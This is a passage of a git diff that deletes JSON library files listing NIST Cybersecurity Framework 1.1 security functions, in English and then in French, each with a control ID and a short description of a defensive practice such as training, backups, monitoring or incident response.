"name": "PR.AT-1", - "description": "All users are informed and trained.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AT-2", - "description": "Privileged users understand their roles and responsibilities.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AT-3", - "description": "Third-party stakeholders (e.g., suppliers, customers, partners) understand their roles and responsibilities.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AT-4", - "description": "Senior executives understand their roles and responsibilities.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AT-5", - "description": "Physical and cybersecurity personnel understand their roles and responsibilities.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.DS-1", - "description": "Data-at-rest is protected.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.DS-2", - "description": "Data-in-transit is protected.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.DS-3", - "description": "Assets are formally managed throughout removal, transfers, and disposition.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.DS-4", - "description": "Adequate capacity to ensure availability is maintained.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.DS-5", - "description": "Protections against data leaks are implemented.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.DS-6", - "description": "Integrity checking mechanisms are used to verify software, firmware, and information integrity.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.DS-7", - "description": "The development and testing environment(s) are separate from the production environment.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.DS-8", - "description": "Integrity checking mechanisms are used to verify hardware integrity.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-1", - "description": "A baseline configuration of information technology/industrial control systems is created and maintained incorporating security principles (e.g. concept of least functionality).", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-2", - "description": "A System Development Life Cycle to manage systems is implemented.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-3", - "description": "Configuration change control processes are in place.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-4", - "description": "Backups of information are conducted, maintained, and tested.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-5", - "description": "Policy and regulations regarding the physical operating environment for organizational assets are met.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-6", - "description": "Data is destroyed according to policy.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-7", - "description": "Protection processes are improved.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-8", - "description": "Effectiveness of protection technologies is shared.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-9", - "description": "Response plans (Incident Response and Business Continuity) and recovery plans (Incident Recovery and Disaster Recovery) are in place and managed.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-10", - "description": "Response and recovery plans are tested.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-11", - "description": "Cybersecurity is included in human resources practices (e.g., deprovisioning, personnel screening).", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-12", - "description": "A vulnerability management plan is developed and implemented.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.MA-1", - "description": "Maintenance and repair of organizational assets are performed and logged, with approved and controlled tools.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.MA-2", - "description": "Remote maintenance of organizational assets is approved, logged, and performed in a manner that prevents unauthorized access.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.PT-1", - "description": "Audit/log records are determined, documented, implemented, and reviewed in accordance with policy.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.PT-2", - "description": "Removable media is protected and its use restricted according to policy.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.PT-3", - "description": "The principle of least functionality is incorporated by configuring systems to provide only essential capabilities.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.PT-4", - "description": "Communications and control networks are protected.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.PT-5", - "description": "Mechanisms (e.g., failsafe, load balancing, hot swap) are implemented to achieve resilience requirements in normal and adverse situations.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.AE-1", - "description": "A baseline of network operations and expected data flows for users and systems is established and managed.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.AE-2", - "description": "Detected events are analyzed to understand attack targets and methods.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.AE-3", - "description": "Event data are collected and correlated from multiple sources and sensors.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.AE-4", - "description": "Impact of events is determined.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.AE-5", - "description": "Incident alert thresholds are established.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.CM-1", - "description": "The network is monitored to detect potential cybersecurity events.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.CM-2", - "description": "The physical environment is monitored to detect potential cybersecurity events.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.CM-3", - "description": "Personnel activity is monitored to detect potential cybersecurity events.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.CM-4", - "description": "Malicious code is detected.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.CM-5", - "description": "Unauthorized mobile code is detected.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.CM-6", - "description": "External service provider activity is monitored to detect potential cybersecurity events.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.CM-7", - "description": "Monitoring for unauthorized personnel, connections, devices, and software is performed.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.CM-8", - "description": "Vulnerability scans are performed.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.DP-1", - "description": "Roles and responsibilities for detection are well defined to ensure accountability.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.DP-2", - "description": "Detection activities comply with all applicable requirements.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.DP-3", - "description": "Detection processes are tested.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.DP-4", - "description": "Event detection information is communicated.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.DP-5", - "description": "Detection processes are continuously improved.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.RP-1", - "description": "Response plan is executed during or after an incident.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.CO-1", - "description": "Personnel know their roles and order of operations when a response is needed.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.CO-2", - "description": "Incidents are reported consistent with established criteria.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.CO-3", - "description": "Information is shared consistent with response plans.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.CO-4", - "description": "Coordination with stakeholders occurs consistent with response plans.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.CO-5", - "description": "Voluntary information sharing occurs with external stakeholders to achieve broader cybersecurity situational awareness.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.AN-1", - "description": "Notifications from detection systems are investigated.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.AN-2", - "description": "The impact of the incident is understood.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.AN-3", - "description": "Forensics are performed.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.AN-4", - "description": "Incidents are categorized consistent with response plans.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.AN-5", - "description": "Processes are established to receive, analyze and respond to vulnerabilities disclosed to the organization from internal and external sources (e.g. internal testing, security bulletins, or security researchers)", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.MI-1", - "description": "Incidents are contained.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.MI-2", - "description": "Incidents are mitigated.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.MI-3", - "description": "Newly identified vulnerabilities are mitigated or documented as accepted risks.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.IM-1", - "description": "Response plans incorporate lessons learned.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.IM-2", - "description": "Response strategies are updated.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RC.RP-1", - "description": "Recovery plan is executed during or after a cybersecurity incident.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RC.IM-1", - "description": "Recovery plans incorporate lessons learned.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RC.IM-2", - "description": "Recovery strategies are updated.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RC.CO-1", - "description": "Public relations are managed.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RC.CO-2", - "description": "Reputation is repaired after an incident.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RC.CO-3", - "description": "Recovery activities are communicated to internal and external stakeholders as well as executive and management teams.", - "provider": "NIST CSF", - "contact": "" - } - } - ] -} \ No newline at end of file diff --git a/library/libraries/nist_measures_fr.json b/library/libraries/nist_measures_fr.json deleted file mode 100644 index f0d2e44..0000000 --- a/library/libraries/nist_measures_fr.json +++ /dev/null @@ -1,981 +0,0 @@ -{ - "locale": "fr", - "name": "NIST CSF 1.1 - fonctions de s\u00e9curit\u00e9", - "description": "Fonctions de s\u00e9curit\u00e9 inspir\u00e9es du NIST CSF 1.1", - "format_version": "1.0", - "Copyright": "https://www.nist.gov/open/license", - "objects": [ - { - "type": "security_function", - "fields": { - "name": "ID.AM-1", - "description": "D\u00e9veloppez un processus d\u2019inventaire garantissant en permanence un recensement exhaustif de vos \u00e9quipements TIC (Asset).", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.AM-2", - "description": "Inventoriez toutes les plateformes, licences et applications logicielles dans votre entreprise.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.AM-3", - "description": "Listez tous les flux de communication et de transferts de donn\u00e9es en interne.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.AM-4", - "description": "Listez tous les syst\u00e8mes TIC externes cruciaux pour votre entreprise.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.AM-5", - "description": "Etablissez des priorit\u00e9s pour les ressources inventori\u00e9es (\u00e9quipements, donn\u00e9es, temps, personnel et applications) selon leur criticit\u00e9.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.AM-6", - "description": "D\u00e9finissez clairement les r\u00f4les et les responsabilit\u00e9s en mati\u00e8re de cybers\u00e9curit\u00e9.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.BE-1", - "description": "D\u00e9finissez, documentez et communiquez le r\u00f4le exact de votre entreprise dans la cha\u00eene d\u2019approvisionnement (critique).", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.BE-2", - "description": "Identifiez et communiquez l\u2019importance de votre entreprise en tant qu\u2019infrastructure vitale et sa position dans le secteur critique.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.BE-3", - "description": "Evaluez et hi\u00e9rarchisez les objectifs, les t\u00e2ches et les activit\u00e9s dans l\u2019entreprise.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.BE-4", - "description": "Listez tous les syst\u00e8mes TIC externes cruciaux pour votre entreprise.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.BE-5", - "description": "D\u00e9finissez les exigences de r\u00e9silience pour les activit\u00e9s de l'entreprise dans toutes les situations op\u00e9rationnelles (par exemple pendant une prise d'otage ou une attaque, en cas de reprise, en r\u00e9gime nominal).", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.GV-1", - "description": "\u00c9dictez une politique de s\u00e9curit\u00e9 informatique dans votre entreprise.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.GV-2", - "description": "Convenir entre les responsables internes (gestion des risques par ex.) et des partenaires externes, des r\u00f4les et des responsabilit\u00e9s en mati\u00e8re de s\u00e9curit\u00e9 informatique.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.GV-3", - "description": "V\u00e9rifiez que votre entreprise respecte toutes les exigences l\u00e9gales et r\u00e9glementaires en mati\u00e8re de cybers\u00e9curit\u00e9, y compris au niveau de la protection des donn\u00e9es.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.GV-4", - "description": "Assurez-vous que les cyber-risques sont bien int\u00e9gr\u00e9s dans la gestion des risques pour toute l\u2019entreprise.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.RA-1", - "description": "Identifiez les faiblesses (techniques) de vos \u00e9quipements et documentez-les.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.RA-2", - "description": "Participez \u00e0 des forums et \u00e0 des r\u00e9unions d\u2019experts pour \u00e9changer des informations et \u00eatre au courant des cybermenaces.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.RA-3", - "description": "Identifiez et documentez les cybermenaces, aussi bien internes qu\u2019externes.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.RA-4", - "description": "Identifiez l\u2019impact potentiel des cybermenaces sur vos activit\u00e9s et \u00e9valuez leur probabilit\u00e9 d\u2019occurrence.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.RA-5", - "description": "\u00c9valuez les risques pour votre entreprise en fonction des menaces, des vuln\u00e9rabilit\u00e9s, de l\u2019impact (sur ses activit\u00e9s) et de leur probabilit\u00e9 d\u2019occurrence.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.RA-6", - "description": "D\u00e9finissez les mesures \u00e0 prendre imm\u00e9diatement lorsqu\u2019un risque se concr\u00e9tise et fixez des priorit\u00e9s.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.RM-1", - "description": "D\u00e9finissez les processus de gestion des risques, g\u00e9rez-les activement et faites-les confirmer par les personnes impliqu\u00e9es ou les parties prenantes.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.RM-2", - "description": "D\u00e9finissez et communiquez les risques supportables pour votre entreprise.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.RM-3", - "description": "Assurez-vous que les risques supportables sont \u00e9valu\u00e9s en prenant en compte l\u2019importance de votre entreprise du fait qu\u2019elle exploite une infrastructure critique. Prenez \u00e9galement en consid\u00e9ration, dans votre analyse, les risques propres au secteur.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.SC-1", - "description": "D\u00e9finissez des processus clairs pour g\u00e9rer les risques li\u00e9s \u00e0 une perturbation dans la cha\u00eene d\u2019approvisionnement. Faites contr\u00f4ler et valider ces processus par toutes les parties prenantes.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.SC-2", - "description": "Identifiez les fournisseurs et les prestataires de services cruciaux pour vos syst\u00e8mes, composants et services critiques \u00e0 partir des processus d\u00e9finis ci-dessus et fixez les priorit\u00e9s.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.SC-3", - "description": "Exigez de vos fournisseurs et prestataires de services qu\u2019ils s\u2019engagent contractuellement \u00e0 d\u00e9velopper et mettre en oeuvre des mesures appropri\u00e9es pour atteindre les objectifs du processus pour g\u00e9rer les risques li\u00e9s \u00e0 la cha\u00eene d\u2019approvisionnement.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.SC-4", - "description": "Faites un suivi syst\u00e9matique pour vous assurer que tous vos fournisseurs et prestataires de services remplissent leurs obligations conform\u00e9ment aux exigences. Faites-le v\u00e9rifier r\u00e9guli\u00e8rement par des rapports d\u2019audit ou par les r\u00e9sultats des tests techniques.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "ID.SC-5", - "description": "D\u00e9finissez avec vos fournisseurs et prestataires les processus pour r\u00e9agir et r\u00e9cup\u00e9rer apr\u00e8s des probl\u00e8mes de cybers\u00e9curit\u00e9. Validez ces processus par des simulations.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AC-1", - "description": "D\u00e9finissez un processus clair pour octroyer et g\u00e9rer les autorisations et les donn\u00e9es d\u2019identification pour utilisateurs, appareils/machines et processus.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AC-2", - "description": "Assurez-vous que seules les personnes autoris\u00e9es ont physiquement acc\u00e8s aux \u00e9quipements TIC. Prenez des mesures concr\u00e8tes pour garantir que les ressources TIC sont prot\u00e9g\u00e9es contre tout acc\u00e8s physique non autoris\u00e9.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AC-3", - "description": "D\u00e9finissez les processus pour g\u00e9rer les acc\u00e8s \u00e0 distance.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AC-4", - "description": "D\u00e9finissez les niveaux d\u2019autorisation en \u00e9tant le plus restrictif possible et s\u00e9parez les fonctions.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AC-5", - "description": "V\u00e9rifiez que l\u2019int\u00e9grit\u00e9 de votre r\u00e9seau est prot\u00e9g\u00e9e. S\u00e9parez votre r\u00e9seau au niveau logique comme physique, si c\u2019est n\u00e9cessaire et judicieux.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AC-6", - "description": "N\u2019attribuez des identit\u00e9s num\u00e9riques qu\u2019\u00e0 des personnes ou \u00e0 des processus que vous avez clairement identifi\u00e9s.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AC-7", - "description": "Les utilisateurs, \u00e9quipements et autres biens sont authentif\u00e9s avec un niveau de s\u00e9curit\u00e9 (simple facteur, multi-facteur) coh\u00e9rent avec le risque encouru. ", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AT-1", - "description": "Veillez \u00e0 ce que tous vos collaborateurs soient sensibilis\u00e9s et form\u00e9s en mati\u00e8re de cybers\u00e9curit\u00e9.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AT-2", - "description": "Veillez \u00e0 ce que les utilisateurs ayant des niveaux d\u2019autorisation \u00e9lev\u00e9s soient conscients de leur r\u00f4le et de leurs responsabilit\u00e9s.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AT-3", - "description": "Veillez \u00e0 ce que tous les acteurs ext\u00e9rieurs \u00e0 votre entreprise (fournisseurs, clients, partenaires) soient conscients de leur r\u00f4le et de leurs responsabilit\u00e9s.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AT-4", - "description": "Veillez \u00e0 ce que tous les cadres soient conscients de leurs r\u00f4les sp\u00e9cifiques et de leurs responsabilit\u00e9s.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.AT-5", - "description": "Veillez \u00e0 ce que les responsables de la s\u00e9curit\u00e9 physique et de la s\u00e9curit\u00e9 informatique soient conscients de leurs r\u00f4les sp\u00e9cifiques et de leurs responsabilit\u00e9s.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.DS-1", - "description": "Assurez-vous que les donn\u00e9es stock\u00e9es sont prot\u00e9g\u00e9es (contre toute atteinte ou pr\u00e9judice en termes de confidentialit\u00e9, d\u2019int\u00e9grit\u00e9 et de disponibilit\u00e9).", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.DS-2", - "description": "Assurez-vous que les donn\u00e9es sont prot\u00e9g\u00e9es pendant leur transmission (contre toute atteinte ou pr\u00e9judice en termes de confidentialit\u00e9, d\u2019int\u00e9grit\u00e9 et de disponibilit\u00e9).", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.DS-3", - "description": "Veillez \u00e0 ce qu\u2019un processus formel soit d\u00e9fini pour votre mat\u00e9riel TIC afin de prot\u00e9ger les donn\u00e9es lorsque des \u00e9quipements sont supprim\u00e9s, d\u00e9plac\u00e9s ou remplac\u00e9s.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.DS-4", - "description": "Veillez \u00e0 ce que vos \u00e9quipements TIC aient une r\u00e9serve de capacit\u00e9 suffisante afin que vos donn\u00e9es soient toujours disponibles.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.DS-5", - "description": "Assurez-vous que des mesures appropri\u00e9es sont mises en oeuvre contre les fuites de donn\u00e9es.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.DS-6", - "description": "D\u00e9finissez un processus pour v\u00e9rifier l\u2019int\u00e9grit\u00e9 du micrologiciel, des syst\u00e8mes d\u2019exploitation, des logiciels d\u2019application et des donn\u00e9es.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.DS-7", - "description": "Pour le d\u00e9veloppement et les tests, ayez un environnement informatique totalement ind\u00e9pendant des syst\u00e8mes de production.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.DS-8", - "description": "D\u00e9finissez un processus pour v\u00e9rifier l\u2019int\u00e9grit\u00e9 du mat\u00e9riel utilis\u00e9.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-1", - "description": "G\u00e9n\u00e9rez une configuration standard pour l\u2019infrastructure d\u2019information et de communication, ainsi que pour les syst\u00e8mes de contr\u00f4le industriels. Assurez-vous que cette configuration par d\u00e9faut ob\u00e9it aux r\u00e8gles usuelles de s\u00e9curit\u00e9 (par ex. redondance N-1, configuration minimale, etc.).", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-2", - "description": "D\u00e9finissez un processus \u00ab cycle de vie \u00bb pour l\u2019utilisation des \u00e9quipements TIC.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-3", - "description": "D\u00e9finissez un processus pour contr\u00f4ler les changements de configuration.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-4", - "description": "Assurez-vous que des sauvegardes informatiques (backups) sont effectu\u00e9es, g\u00e9r\u00e9es et test\u00e9es r\u00e9guli\u00e8rement (+ qu\u2019on peut restaurer les donn\u00e9es sauvegard\u00e9es).", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-5", - "description": "Veillez \u00e0 ce que toutes les exigences (r\u00e9glementaires) et les directives concernant les \u00e9quipements \u00ab physiques \u00bb soient respect\u00e9es.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-6", - "description": "Veillez \u00e0 ce que les donn\u00e9es soient toujours d\u00e9truites selon les prescriptions.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-7", - "description": "D\u00e9veloppez et am\u00e9liorez r\u00e9guli\u00e8rement vos processus de s\u00e9curit\u00e9 informatique.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-8", - "description": "Discutez de l\u2019efficacit\u00e9 des diff\u00e9rentes technologies de protection avec vos partenaires.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-9", - "description": "Instaurez des processus pour r\u00e9agir aux cyberincidents. (Incident Response-Planing, Business Continuity Management, Incident Recovery, Disaster Recovery).", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-10", - "description": "Testez les plans de r\u00e9action et de r\u00e9cup\u00e9ration.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-11", - "description": "Tenez compte de la cybers\u00e9curit\u00e9 d\u00e8s le processus de recrutement (en v\u00e9rifiant les ant\u00e9c\u00e9dents ou par des contr\u00f4les de s\u00e9curit\u00e9 personnels, par ex.).", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.IP-12", - "description": "D\u00e9veloppez et mettez en oeuvre un processus pour traiter les failles rep\u00e9r\u00e9es.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.MA-1", - "description": "Veillez \u00e0 ce que le fonctionnement, la maintenance et les \u00e9ventuelles r\u00e9parations des \u00e9quipements soient enregistr\u00e9s et document\u00e9s (journalisation). Assurez-vous qu\u2019elles sont effectu\u00e9es rapidement et en ne recourant qu\u2019\u00e0 des moyens test\u00e9s et approuv\u00e9s.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.MA-2", - "description": "Enregistrez et documentez \u00e9galement les travaux de maintenance de vos syst\u00e8mes distants. Assurez-vous qu\u2019aucun acc\u00e8s non autoris\u00e9 n\u2019est possible.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.PT-1", - "description": "G\u00e9n\u00e9rez et v\u00e9rifiez ces fichiers r\u00e9guli\u00e8rement, selon les exigences et les directives.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.PT-2", - "description": "Assurez-vous que les supports amovibles sont prot\u00e9g\u00e9s et que leur utilisation se fait dans le strict respect des directives.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.PT-3", - "description": "Veillez \u00e0 ce que votre syst\u00e8me soit configur\u00e9 pour toujours fonctionner, m\u00eame en mode d\u00e9grad\u00e9.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.PT-4", - "description": "Assurez la protection de vos r\u00e9seaux de communication et de contr\u00f4le.", - "provider": "NIST CSF", - 